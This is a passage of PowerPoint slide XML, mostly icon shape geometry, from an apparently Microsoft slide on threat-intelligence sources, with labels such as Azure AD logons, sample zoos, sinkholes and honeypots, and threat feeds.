                <a:latin typeface="Segoe UI Semilight"/>
              </a:rPr>
              <a:t>1+ billion Azure Active Directory logons</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10944486" y="6255316"/>
            <a:ext cx="1217352" cy="519567"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="200" name="Group 199"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="201762" y="919379"/>
            <a:ext cx="11960075" cy="3543490"/>
            <a:chOff x="201762" y="919379"/>
            <a:chExt cx="11960075" cy="3543490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Rectangle 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="274637" y="1286087"/>
              <a:ext cx="7630368" cy="1115568"/>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384176" y="1821672"/>
              <a:ext cx="917559" cy="6001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SAMPLE </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ZOOS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1416177" y="1821672"/>
              <a:ext cx="1170833" cy="6001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TENANT</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DETECTIONS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2701452" y="1821672"/>
              <a:ext cx="1238159" cy="6001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SINKHOLES &amp;</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HONEYPOTS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4054053" y="1821672"/>
              <a:ext cx="1390444" cy="6001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DETONATION &amp;</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SANDBOXES</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5558939" y="1821672"/>
              <a:ext cx="1258999" cy="6001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SERVICES IR</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INTELLIGENCE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6932378" y="1821672"/>
              <a:ext cx="903132" cy="6001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THREAT </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FEEDS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform 5"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4641315" y="1487947"/>
              <a:ext cx="215920" cy="326620"/>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7" name="Group 16"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1831997" y="1481660"/>
              <a:ext cx="339192" cy="339192"/>
              <a:chOff x="2139950" y="2095500"/>
              <a:chExt cx="406400" cy="406400"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Freeform 13"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2139950" y="2095500"/>
                <a:ext cx="406400" cy="406400"/>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4"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2241550" y="2197100"/>
                <a:ext cx="73025" cy="73025"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 46"/>
                  <a:gd name="T1" fmla="*/ 18 h 46"/>
                  <a:gd name="T2" fmla="*/ 46 w 46"/>
                  <a:gd name="T3" fmla="*/ 18 h 46"/>
                  <a:gd name="T4" fmla="*/ 46 w 46"/>
                  <a:gd name="T5" fmla="*/ 0 h 46"/>
                  <a:gd name="T6" fmla="*/ 0 w 46"/>
                  <a:gd name="T7" fmla="*/ 0 h 46"/>
                  <a:gd name="T8" fmla="*/ 0 w 46"/>
                  <a:gd name="T9" fmla="*/ 46 h 46"/>
                  <a:gd name="T10" fmla="*/ 18 w 46"/>
                  <a:gd name="T11" fmla="*/ 46 h 46"/>
                  <a:gd name="T12" fmla="*/ 18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18"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="46" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="46"/>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5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2241550" y="2327275"/>
                <a:ext cx="73025" cy="73025"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 46"/>
                  <a:gd name="T1" fmla="*/ 0 h 46"/>
                  <a:gd name="T2" fmla="*/ 0 w 46"/>
                  <a:gd name="T3" fmla="*/ 0 h 46"/>
                  <a:gd name="T4" fmla="*/ 0 w 46"/>
                  <a:gd name="T5" fmla="*/ 46 h 46"/>
                  <a:gd name="T6" fmla="*/ 46 w 46"/>
                  <a:gd name="T7" fmla="*/ 46 h 46"/>
                  <a:gd name="T8" fmla="*/ 46 w 46"/>
                  <a:gd name="T9" fmla="*/ 28 h 46"/>
                  <a:gd name="T10" fmla="*/ 18 w 46"/>
                  <a:gd name="T11" fmla="*/ 28 h 46"/>
                  <a:gd name="T12" fmla="*/ 18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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2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16"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2371725" y="2327275"/>
                <a:ext cx="73025" cy="73025"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 46"/>
                  <a:gd name="T1" fmla="*/ 28 h 46"/>
                  <a:gd name="T2" fmla="*/ 0 w 46"/>
                  <a:gd name="T3" fmla="*/ 28 h 46"/>
                  <a:gd name="T4" fmla="*/ 0 w 46"/>
                  <a:gd name="T5" fmla="*/ 46 h 46"/>
                  <a:gd name="T6" fmla="*/ 46 w 46"/>
                  <a:gd name="T7" fmla="*/ 46 h 46"/>
                  <a:gd name="T8" fmla="*/ 46 w 46"/>
                  <a:gd name="T9" fmla="*/ 0 h 46"/>
                  <a:gd name="T10" fmla="*/ 28 w 46"/>
                  <a:gd name="T11" fmla="*/ 0 h 46"/>
                  <a:gd name="T12" fmla="*/ 28 w 46"/>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28" y="28"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="0"/>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17"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2371725" y="2197100"/>
                <a:ext cx="73025" cy="73025"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 46"/>
                  <a:gd name="T1" fmla="*/ 18 h 46"/>
                  <a:gd name="T2" fmla="*/ 28 w 46"/>
                  <a:gd name="T3" fmla="*/ 18 h 46"/>
                  <a:gd name="T4" fmla="*/ 28 w 46"/>
                  <a:gd name="T5" fmla="*/ 46 h 46"/>
                  <a:gd name="T6" fmla="*/ 46 w 46"/>
                  <a:gd name="T7" fmla="*/ 46 h 46"/>
                  <a:gd name="T8" fmla="*/ 46 w 46"/>
                  <a:gd name="T9" fmla="*/ 0 h 46"/>
                  <a:gd name="T10" fmla="*/ 0 w 46"/>
                  <a:gd name="T11" fmla="*/ 0 h 46"/>
                  <a:gd name="T12" fmla="*/ 0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0" y="18"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="28" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46"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18"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2300288" y="2255838"/>
                <a:ext cx="85725" cy="85725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 12 h 24"/>
                  <a:gd name="T2" fmla="*/ 12 w 24"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 0 w 24"/>
                  <a:gd name="T5" fmla="*/ 12 h 24"/>
                  <a:gd name="T6" fmla="*/ 12 w 24"/>
                  <a:gd name="T7" fmla="*/ 24 h 24"/>
                  <a:gd name="T8" fmla="*/ 24 w 24"/>
                  <a:gd name="T9" fmla="*/ 12 h 24"/>
                  <a:gd name="T10" fmla="*/ 12 w 24"/>
                  <a:gd name="T11" fmla="*/ 16 h 24"/>
                  <a:gd name="T12" fmla="*/ 8 w 24"/>
                  <a:gd name="T13" fmla="*/ 12 h 24"/>
                  <a:gd name="T14" fmla="*/ 12 w 24"/>
                  <a:gd name="T15" fmla="*/ 8 h 24"/>
                  <a:gd name="T16" fmla="*/ 16 w 24"/>
                  <a:gd name="T17" fmla="*/ 12 h 24"/>
                  <a:gd name="T18" fmla="*/ 12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12" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="16"/>
                      <a:pt x="8" y="14"/>
                      <a:pt x="8" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="10"/>
                      <a:pt x="10" y="8"/>
                      <a:pt x="12" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="8"/>
                      <a:pt x="16" y="10"/>
                      <a:pt x="16" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="14"/>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 name="Freeform 22"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5996319" y="1493585"/>
              <a:ext cx="384240" cy="315344"/>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54"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3139012" y="1469736"/>
              <a:ext cx="363040" cy="363042"/>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60 h 120"/>
                <a:gd name="T16" fmla="*/ 60 w 120"/>
                <a:gd name="T17" fmla="*/ 64 h 120"/>
                <a:gd name="T18" fmla="*/ 56 w 120"/>
                <a:gd name="T19" fmla="*/ 60 h 120"/>
                <a:gd name="T20" fmla="*/ 60 w 120"/>
                <a:gd name="T21" fmla="*/ 56 h 120"/>
                <a:gd name="T22" fmla="*/ 64 w 120"/>
                <a:gd name="T23" fmla="*/ 56 h 120"/>
                <a:gd name="T24" fmla="*/ 64 w 120"/>
                <a:gd name="T25" fmla="*/ 8 h 120"/>
                <a:gd name="T26" fmla="*/ 112 w 120"/>
                <a:gd name="T27" fmla="*/ 56 h 120"/>
                <a:gd name="T28" fmla="*/ 60 w 120"/>
                <a:gd name="T29" fmla="*/ 72 h 120"/>
                <a:gd name="T30" fmla="*/ 71 w 120"/>
                <a:gd name="T31" fmla="*/ 64 h 120"/>
                <a:gd name="T32" fmla="*/ 88 w 120"/>
                <a:gd name="T33" fmla="*/ 64 h 120"/>
                <a:gd name="T34" fmla="*/ 60 w 120"/>
                <a:gd name="T35" fmla="*/ 88 h 120"/>
                <a:gd name="T36" fmla="*/ 32 w 120"/>
                <a:gd name="T37" fmla="*/ 60 h 120"/>
                <a:gd name="T38" fmla="*/ 56 w 120"/>
                <a:gd name="T39" fmla="*/ 32 h 120"/>
                <a:gd name="T40" fmla="*/ 56 w 120"/>
                <a:gd name="T41" fmla="*/ 49 h 120"/>
                <a:gd name="T42" fmla="*/ 48 w 120"/>
                <a:gd name="T43" fmla="*/ 60 h 120"/>
                <a:gd name="T44" fmla="*/ 60 w 120"/>
                <a:gd name="T45" fmla="*/ 72 h 120"/>
                <a:gd name="T46" fmla="*/ 60 w 120"/>
                <a:gd name="T47" fmla="*/ 112 h 120"/>
                <a:gd name="T48" fmla="*/ 8 w 120"/>
                <a:gd name="T49" fmla="*/ 60 h 120"/>
                <a:gd name="T50" fmla="*/ 56 w 120"/>
                <a:gd name="T51" fmla="*/ 8 h 120"/>
                <a:gd name="T52" fmla="*/ 56 w 120"/>
                <a:gd name="T53" fmla="*/ 24 h 120"/>
                <a:gd name="T54" fmla="*/ 24 w 120"/>
                <a:gd name="T55" fmla="*/ 60 h 120"/>
                <a:gd name="T56" fmla="*/ 60 w 120"/>
                <a:gd name="T57" fmla="*/ 96 h 120"/>
                <a:gd name="T58" fmla="*/ 96 w 120"/>
                <a:gd name="T59" fmla="*/ 64 h 120"/>
                <a:gd name="T60" fmla="*/ 112 w 120"/>
                <a:gd name="T61" fmla="*/ 64 h 120"/>
                <a:gd name="T62" fmla="*/ 60 w 120"/>
                <a:gd name="T63" fmla="*/ 112 h 120"/>
                <a:gd name="T64" fmla="*/ 84 w 120"/>
                <a:gd name="T65" fmla="*/ 32 h 120"/>
                <a:gd name="T66" fmla="*/ 80 w 120"/>
                <a:gd name="T67" fmla="*/ 36 h 120"/>
                <a:gd name="T68" fmla="*/ 84 w 120"/>
                <a:gd name="T69" fmla="*/ 40 h 120"/>
                <a:gd name="T70" fmla="*/ 88 w 120"/>
                <a:gd name="T71" fmla="*/ 36 h 120"/>
                <a:gd name="T72" fmla="*/ 84 w 120"/>
                <a:gd name="T73"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60"/>
                    <a:pt x="64" y="60"/>
                    <a:pt x="64" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="62"/>
                    <a:pt x="62" y="64"/>
                    <a:pt x="60" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="64"/>
                    <a:pt x="56" y="62"/>
                    <a:pt x="56" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="58"/>
                    <a:pt x="58" y="56"/>
                    <a:pt x="60" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="56"/>
                    <a:pt x="64" y="56"/>
                    <a:pt x="64" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="8"/>
                    <a:pt x="64" y="8"/>
                    <a:pt x="64" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="10"/>
                    <a:pt x="110" y="31"/>
                    <a:pt x="112" y="56"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="60" y="72"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="72"/>
                    <a:pt x="70" y="69"/>
                    <a:pt x="71" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="64"/>
                    <a:pt x="88" y="64"/>
                    <a:pt x="88" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="78"/>
                    <a:pt x="74" y="88"/>
                    <a:pt x="60" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="88"/>
                    <a:pt x="32" y="75"/>
                    <a:pt x="32" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="46"/>
                    <a:pt x="42" y="34"/>
                    <a:pt x="56" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="49"/>
                    <a:pt x="56" y="49"/>
                    <a:pt x="56" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="50"/>
                    <a:pt x="48" y="55"/>
                    <a:pt x="48" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="67"/>
                    <a:pt x="53" y="72"/>
                    <a:pt x="60" y="72"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="60" y="112"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="112"/>
                    <a:pt x="8" y="89"/>
                    <a:pt x="8" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="33"/>
                    <a:pt x="29" y="10"/>
                    <a:pt x="56" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="24"/>
                    <a:pt x="56" y="24"/>
                    <a:pt x="56" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="26"/>
                    <a:pt x="24" y="42"/>
                    <a:pt x="24" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="80"/>
                    <a:pt x="40" y="96"/>
                    <a:pt x="60" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="96"/>
                    <a:pt x="94" y="82"/>
                    <a:pt x="96" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="64"/>
                    <a:pt x="112" y="64"/>
                    <a:pt x="112" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="91"/>
                    <a:pt x="87" y="112"/>
                    <a:pt x="60" y="112"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="84" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="32"/>
                    <a:pt x="80" y="34"/>
                    <a:pt x="80" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="38"/>
                    <a:pt x="82" y="40"/>
                    <a:pt x="84" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="40"/>
                    <a:pt x="88" y="38"/>
                    <a:pt x="88" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="34"/>
                    <a:pt x="86" y="32"/>
                    <a:pt x="84" y="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103"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7230401" y="1466456"/>
              <a:ext cx="307086" cy="369602"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 649 w 1975"/>
                <a:gd name="T1" fmla="*/ 273 h 2364"/>
                <a:gd name="T2" fmla="*/ 1245 w 1975"/>
                <a:gd name="T3" fmla="*/ 1039 h 2364"/>
                <a:gd name="T4" fmla="*/ 1187 w 1975"/>
                <a:gd name="T5" fmla="*/ 618 h 2364"/>
                <a:gd name="T6" fmla="*/ 230 w 1975"/>
                <a:gd name="T7" fmla="*/ 0 h 2364"/>
                <a:gd name="T8" fmla="*/ 1245 w 1975"/>
                <a:gd name="T9" fmla="*/ 749 h 2364"/>
                <a:gd name="T10" fmla="*/ 1169 w 1975"/>
                <a:gd name="T11" fmla="*/ 824 h 2364"/>
                <a:gd name="T12" fmla="*/ 305 w 1975"/>
                <a:gd name="T13" fmla="*/ 214 h 2364"/>
                <a:gd name="T14" fmla="*/ 230 w 1975"/>
                <a:gd name="T15" fmla="*/ 138 h 2364"/>
                <a:gd name="T16" fmla="*/ 1550 w 1975"/>
                <a:gd name="T17" fmla="*/ 283 h 2364"/>
                <a:gd name="T18" fmla="*/ 1406 w 1975"/>
                <a:gd name="T19" fmla="*/ 1147 h 2364"/>
                <a:gd name="T20" fmla="*/ 970 w 1975"/>
                <a:gd name="T21" fmla="*/ 824 h 2364"/>
                <a:gd name="T22" fmla="*/ 686 w 1975"/>
                <a:gd name="T23" fmla="*/ 1027 h 2364"/>
                <a:gd name="T24" fmla="*/ 756 w 1975"/>
                <a:gd name="T25" fmla="*/ 1815 h 2364"/>
                <a:gd name="T26" fmla="*/ 824 w 1975"/>
                <a:gd name="T27" fmla="*/ 1285 h 2364"/>
                <a:gd name="T28" fmla="*/ 1808 w 1975"/>
                <a:gd name="T29" fmla="*/ 421 h 2364"/>
                <a:gd name="T30" fmla="*/ 1550 w 1975"/>
                <a:gd name="T31" fmla="*/ 145 h 2364"/>
                <a:gd name="T32" fmla="*/ 1031 w 1975"/>
                <a:gd name="T33" fmla="*/ 214 h 2364"/>
                <a:gd name="T34" fmla="*/ 756 w 1975"/>
                <a:gd name="T35" fmla="*/ 1677 h 2364"/>
                <a:gd name="T36" fmla="*/ 833 w 1975"/>
                <a:gd name="T37" fmla="*/ 1601 h 2364"/>
                <a:gd name="T38" fmla="*/ 756 w 1975"/>
                <a:gd name="T39" fmla="*/ 749 h 2364"/>
                <a:gd name="T40" fmla="*/ 1752 w 1975"/>
                <a:gd name="T41" fmla="*/ 138 h 2364"/>
                <a:gd name="T42" fmla="*/ 1676 w 1975"/>
                <a:gd name="T43" fmla="*/ 214 h 2364"/>
                <a:gd name="T44" fmla="*/ 1321 w 1975"/>
                <a:gd name="T45" fmla="*/ 214 h 2364"/>
                <a:gd name="T46" fmla="*/ 1245 w 1975"/>
                <a:gd name="T47" fmla="*/ 138 h 2364"/>
                <a:gd name="T48" fmla="*/ 1959 w 1975"/>
                <a:gd name="T49" fmla="*/ 1601 h 2364"/>
                <a:gd name="T50" fmla="*/ 1668 w 1975"/>
                <a:gd name="T51" fmla="*/ 1801 h 2364"/>
                <a:gd name="T52" fmla="*/ 1463 w 1975"/>
                <a:gd name="T53" fmla="*/ 2073 h 2364"/>
                <a:gd name="T54" fmla="*/ 1264 w 1975"/>
                <a:gd name="T55" fmla="*/ 2364 h 2364"/>
                <a:gd name="T56" fmla="*/ 1761 w 1975"/>
                <a:gd name="T57" fmla="*/ 2364 h 2364"/>
                <a:gd name="T58" fmla="*/ 1264 w 1975"/>
                <a:gd name="T59" fmla="*/ 2226 h 2364"/>
                <a:gd name="T60" fmla="*/ 1340 w 1975"/>
                <a:gd name="T61" fmla="*/ 2150 h 2364"/>
                <a:gd name="T62" fmla="*/ 1821 w 1975"/>
                <a:gd name="T63" fmla="*/ 1601 h 2364"/>
                <a:gd name="T64" fmla="*/ 1745 w 1975"/>
                <a:gd name="T65" fmla="*/ 1525 h 2364"/>
                <a:gd name="T66" fmla="*/ 1761 w 1975"/>
                <a:gd name="T67" fmla="*/ 2073 h 2364"/>
                <a:gd name="T68" fmla="*/ 1217 w 1975"/>
                <a:gd name="T69" fmla="*/ 1810 h 2364"/>
                <a:gd name="T70" fmla="*/ 1264 w 1975"/>
                <a:gd name="T71" fmla="*/ 1387 h 2364"/>
                <a:gd name="T72" fmla="*/ 867 w 1975"/>
                <a:gd name="T73" fmla="*/ 1966 h 2364"/>
                <a:gd name="T74" fmla="*/ 412 w 1975"/>
                <a:gd name="T75" fmla="*/ 2073 h 2364"/>
                <a:gd name="T76" fmla="*/ 443 w 1975"/>
                <a:gd name="T77" fmla="*/ 824 h 2364"/>
                <a:gd name="T78" fmla="*/ 169 w 1975"/>
                <a:gd name="T79" fmla="*/ 1030 h 2364"/>
                <a:gd name="T80" fmla="*/ 214 w 1975"/>
                <a:gd name="T81" fmla="*/ 2364 h 2364"/>
                <a:gd name="T82" fmla="*/ 756 w 1975"/>
                <a:gd name="T83" fmla="*/ 2364 h 2364"/>
                <a:gd name="T84" fmla="*/ 1217 w 1975"/>
                <a:gd name="T85" fmla="*/ 1810 h 2364"/>
                <a:gd name="T86" fmla="*/ 1340 w 1975"/>
                <a:gd name="T87" fmla="*/ 1601 h 2364"/>
                <a:gd name="T88" fmla="*/ 1264 w 1975"/>
                <a:gd name="T89" fmla="*/ 1525 h 2364"/>
                <a:gd name="T90" fmla="*/ 214 w 1975"/>
                <a:gd name="T91" fmla="*/ 2073 h 2364"/>
                <a:gd name="T92" fmla="*/ 230 w 1975"/>
                <a:gd name="T93" fmla="*/ 901 h 2364"/>
                <a:gd name="T94" fmla="*/ 305 w 1975"/>
                <a:gd name="T95" fmla="*/ 824 h 2364"/>
                <a:gd name="T96" fmla="*/ 681 w 1975"/>
                <a:gd name="T97" fmla="*/ 2150 h 2364"/>
                <a:gd name="T98" fmla="*/ 756 w 1975"/>
                <a:gd name="T99" fmla="*/ 2226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5" h="2364">
                  <a:moveTo>
                    <a:pt x="230" y="428"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="428"/>
                    <a:pt x="409" y="363"/>
                    <a:pt x="435" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="649" y="273"/>
                    <a:pt x="649" y="273"/>
                    <a:pt x="649" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1072" y="698"/>
                    <a:pt x="1072" y="698"/>
                    <a:pt x="1072" y="698"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1046" y="734"/>
                    <a:pt x="1031" y="777"/>
                    <a:pt x="1031" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1031" y="943"/>
                    <a:pt x="1127" y="1039"/>
                    <a:pt x="1245" y="1039"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1362" y="1039"/>
                    <a:pt x="1459" y="943"/>
                    <a:pt x="1459" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1459" y="707"/>
                    <a:pt x="1362" y="611"/>
                    <a:pt x="1245" y="611"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1225" y="611"/>
                    <a:pt x="1205" y="613"/>
                    <a:pt x="1187" y="618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="706" y="135"/>
                    <a:pt x="706" y="135"/>
                    <a:pt x="706" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="135"/>
                    <a:pt x="427" y="135"/>
                    <a:pt x="427" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="396" y="55"/>
                    <a:pt x="319" y="0"/>
                    <a:pt x="230" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="0"/>
                    <a:pt x="16" y="96"/>
                    <a:pt x="16" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="332"/>
                    <a:pt x="112" y="428"/>
                    <a:pt x="230" y="428"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1245" y="749"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1287" y="749"/>
                    <a:pt x="1321" y="782"/>
